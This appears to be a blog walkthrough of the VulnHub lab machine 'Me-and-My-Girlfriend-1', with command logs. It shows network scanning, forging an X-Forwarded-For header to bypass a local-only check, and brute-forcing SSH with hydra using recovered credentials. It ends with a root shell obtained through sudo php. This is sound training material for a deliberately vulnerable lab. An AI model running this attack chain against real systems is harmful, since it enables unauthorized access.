vulnhub Me-and-My-Girlfriend-1

vulnhub Me-and-My-Girlfriend-1

sudo arp-scan -l

┌──(jeremiah㉿kali)-[~/桌面]
└─$ sudo arp-scan -l       
[sudo] jeremiah 的密码:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:49:c8:a6, IPv4: 192.168.0.112
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     90:76:9f:cd:9b:31       (Unknown)
192.168.0.106   b4:b5:b6:73:75:81       (Unknown)
192.168.0.110   00:0c:29:62:e3:74       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 1.932 seconds (132.51 hosts/sec). 3 responded
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

nmap -Pn -sV -p- -A 192.168.0.110

┌──(jeremiah㉿kali)-[~/桌面]
└─$ nmap -Pn -sV -p- -A 192.168.0.110 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-14 20:31 CST
Nmap scan report for 192.168.0.110 (192.168.0.110)
Host is up (0.00024s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:e1:56:58:46:04:33:56:3d:c3:4b:a7:93:ee:23:16 (DSA)
|   2048 3b:26:4d:e4:a0:3b:f8:75:d9:6e:15:55:82:8c:71:97 (RSA)
|   256 8f:48:97:9b:55:11:5b:f1:6c:1d:b3:4a:bc:36:bd:b0 (ECDSA)
|_  256 d0:c3:02:a1:c4:c2:a8:ac:3b:84:ae:8f:e5:79:66:76 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.27 seconds
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

192.168.0.110 开放端口22、80

http://192.168.0.110/

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!

源码:

Who are you? Hacker? Sorry This Site Can Only Be Accessed local!<!-- Maybe you can search how to use x-forwarded-for -→

插件伪造XFF

X-Forwarded-For 127.0.0.1

dirb http://192.168.0.110/

┌──(jeremiah㉿kali)-[~/桌面]
└─$ dirb http://192.168.0.110/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Jul 14 20:39:35 2022
URL_BASE: http://192.168.0.110/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                         GENERATED WORDS: 4612

---- Scanning URL: http://192.168.0.110/ ----
                                                                                                                                                  ==> DIRECTORY: http://192.168.0.110/config/
+ http://192.168.0.110/index.php (CODE:200|SIZE:120)                    
                                                                         ==> DIRECTORY: http://192.168.0.110/misc/
+ http://192.168.0.110/robots.txt (CODE:200|SIZE:32)                    
+ http://192.168.0.110/server-status (CODE:403|SIZE:293)                
                                                                        
---- Entering directory: http://192.168.0.110/config/ ----
                                                                         (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
                                                                        
---- Entering directory: http://192.168.0.110/misc/ ----
                                                                         (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Thu Jul 14 20:39:41 2022
DOWNLOADED: 4612 - FOUND: 3
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

访问了下都没什么用

注册发现水平越权漏洞

user.txt

eweuhtandingan
aingmaung
alice

pwd.txt

skuyatuh
qwerty!!!
4lic3

hydra -L user.txt -P pwd.txt ssh://192.168.0.110

┌──(jeremiah㉿kali)-[~/桌面]
└─$ hydra -L user.txt -P pwd.txt ssh://192.168.0.110
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-07-14 20:48:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3/p:3), ~1 try per task
[DATA] attacking ssh://192.168.0.110:22/
[22][ssh] host: 192.168.0.110   login: alice   password: 4lic3
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-07-14 20:48:28
                                                                         
┌──(jeremiah㉿kali)-[~/桌面]
└─$

user: alice

pwd: 4lic3

ssh alice@192.168.0.110

ls -al

cd .my_secret

ls

cat flag1.txt

alice@gfriEND:~/.my_secret$ cat flag1.txt
Greattttt my brother! You saw the Alice's note! Now you save the record information to give to bob! I know if it's given to him then Bob will be hurt but this is better than Bob cheated!

Now your last job is get access to the root and read the flag ^_^

Flag 1 : gfriEND{2f5f21b2af1b8c3e227bcf35544f8f09}

CMD="/bin/sh"

sudo php -r "system('$CMD');"

whomai

cd /root

ls

cat flag2.txt

Yeaaahhhh!! You have successfully hacked this company server! I hope you who have just learned can get new knowledge from here :) I really hope you guys give me feedback for this challenge whether you like it or not because it can be a reference for me to be even better! I hope this can continue :)

Contact me if you want to contribute / give me feedback / share your writeup!
Twitter: @makegreatagain_
Instagram: @aldodimas73

Thanks! Flag 2: gfriEND{56fbeef560930e77ff984b644fde66e7}
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Jerem1ah

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值